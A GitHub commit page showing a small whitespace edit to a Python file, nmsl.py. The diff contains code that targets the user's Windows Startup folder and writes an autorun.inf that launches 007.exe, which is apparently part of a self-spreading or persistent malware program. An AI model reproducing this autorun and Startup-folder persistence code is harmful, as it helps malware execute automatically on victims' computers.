We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent ab9546c commit b708d3dCopy full SHA for b708d3d
nmsl.py
@@ -8,8 +8,7 @@
8
work_home="C:\\Users\\{0}\\AppData\\Roaming\\Microsoft\\Windows\\{1}\\Programs\\Startup".format(os.getlogin(),'Start Menu')
9
10
def writeconfig():
11
- autorun='''
12
-[autorun]
+ autorun='''[autorun]
13
open=007.exe
14
icon=007.exe
15
'''
0 commit comments